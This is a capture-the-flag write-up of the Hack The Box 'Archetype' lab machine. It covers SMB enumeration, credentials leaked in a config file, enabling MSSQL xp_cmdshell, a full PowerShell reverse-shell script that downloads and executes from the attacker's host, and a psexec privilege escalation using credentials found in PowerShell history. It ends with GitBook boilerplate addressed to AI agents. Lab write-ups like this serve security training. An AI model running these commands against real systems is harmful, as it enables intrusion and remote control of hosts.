> For the complete documentation index, see [llms.txt](https://htb.haydenhousen.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://htb.haydenhousen.com/old-starting-point-writeups/archetype.md). # Archetype HTB - Archetype 1. Scan with `nmap`: ``` kali@kali:~$ nmap -T4 -A -p- 10.10.10.27 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-03 17:58 EDT Nmap scan report for 10.10.10.27 Host is up (0.042s latency). Not shown: 65480 closed ports, 43 filtered ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds 1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM | ms-sql-ntlm-info: | Target_Name: ARCHETYPE | NetBIOS_Domain_Name: ARCHETYPE | NetBIOS_Computer_Name: ARCHETYPE | DNS_Domain_Name: Archetype | DNS_Computer_Name: Archetype |_ Product_Version: 10.0.17763 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2020-05-03T17:16:49 |_Not valid after: 2050-05-03T17:16:49 |_ssl-date: 2020-05-03T22:15:41+00:00; +14m18s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 1h38m18s, deviation: 3h07m51s, median: 14m17s | ms-sql-info: | 10.10.10.27:1433: | Version: | name: Microsoft SQL Server 2017 RTM | number: 14.00.1000.00 | Product: Microsoft SQL Server 2017 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | smb-os-discovery: | OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3) | Computer name: Archetype | NetBIOS computer name: ARCHETYPE\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2020-05-03T15:15:32-07:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-05-03T22:15:33 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 187.16 seconds ``` 2. Nessus scan for fun Start with `sudo /etc/init.d/nessusd start` and go to `https://kali:8834` 3. Samba is open so lets see is anonymous login enabled and list the shares ``` smbclient -L \\\\10.10.10.27\\ anonymous (or use -N in above command for anonymous login) ``` Result: `backups` directory found See inside `backups`: `smbclient -N \\\\10.10.10.27\\backups`. There is a dtsConfig file, which is a config file used with SSIS: ``` get prod.dtsConfig exit cat pro.dtsConfig ``` ``` ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False; ``` Result: Contains credientials for user `ARCHETYPE\sql_svc` with password `M3g4c0rp123`. 4. Target is running `Microsoft SQL Server 2017 14.00.1000.00` per the `nmap` scan. Searching for exploit reveals [Rapid 7](https://www.rapid7.com/db/modules/exploit/windows/mssql/mssql_payload) and [HackTricks Book](https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server) * HackTricks had command to gather info about the service: `nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=ARCHETYPE\sql_svc,mssql.password=M3g4c0rp123,mssql.instance-name=ARCHETYPE -sV -p 1433 10.10.10.27` which was not helpful since it is similar to the `-A` flag. * Attempt Metasploit exploit: ``` sudo msfconsole search mssql use exploit/windows/mssql/mssql_payload options set username sql_svc set password M3g4c0rp123 set rhosts 10.10.10.27 set USE_WINDOWS_AUTHENT true set payload windows/meterpreter/reverse_tcp options run ``` Possibly could use `set payload windows/shell_reverse_tcp` Failed. * Manual Exploit * Let's try connecting to the SQL Server using Impacket's mssqlclient.py: `python3 mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -win`dows-auth\` * We can use the `IS_SRVROLEMEMBER` function to reveal whether the current SQL user has sysadmin (highest level) privileges on the SQL Server. This is successful, and we do indeed have sysadmin privileges. This will allow us to enable xp\_cmdshell and gain RCE on the host. Let's attempt this, by inputting the commands below. ``` EXEC sp_configure 'Show Advanced Options', 1; reconfigure; sp_configure; EXEC sp_configure 'xp_cmdshell', 1 reconfigure; xp_cmdshell "whoami" ``` * Save following as `shell.ps1`: `kali@kali:~$ cat shell.ps1 $client = New-Object System.Net.Sockets.TCPClient("10.10.15.117",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()` * Next, stand up a mini webserver in order to host the file. We can use Python: `python3 -m http.server 80` * After standing up a netcat listener on port 443: `nc -lvnp 443` * We can now issue the command to download and execute the reverse shell through xp\_cmdshell: `xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.15.117/shell.ps1\");"` * A shell is received as sql\_svc, and we can get the user.txt on their desktop. 5. Privilege Escalation * As this is a normal user account as well as a service account, it is worth checking for frequently access files or executed commands. We can use the command below to access the PowerShell history file: `type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt` Result: `net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!` * This reveals that the backups drive has been mapped using the local administrator credentials. We can use Impacket's psexec.py to gain a privileged shell. ``` kali@kali:~/Downloads/impacket-0.9.21/examples$ python3 psexec.py administrator@10.10.10.27 Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation Password: MEGACORP_4dm1n!! [*] Requesting shares on 10.10.10.27..... [*] Found writable share ADMIN$ [*] Uploading file tHaoJdVi.exe [*] Opening SVCManager on 10.10.10.27..... [*] Creating service JESk on 10.10.10.27..... [*] Starting service JESk..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.107] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system ``` * Get flag ``` cd C:\Users\Administrator\Desktop type root.txt b91ccec3305e98240082d4474b848528 ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://htb.haydenhousen.com/old-starting-point-writeups/archetype.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.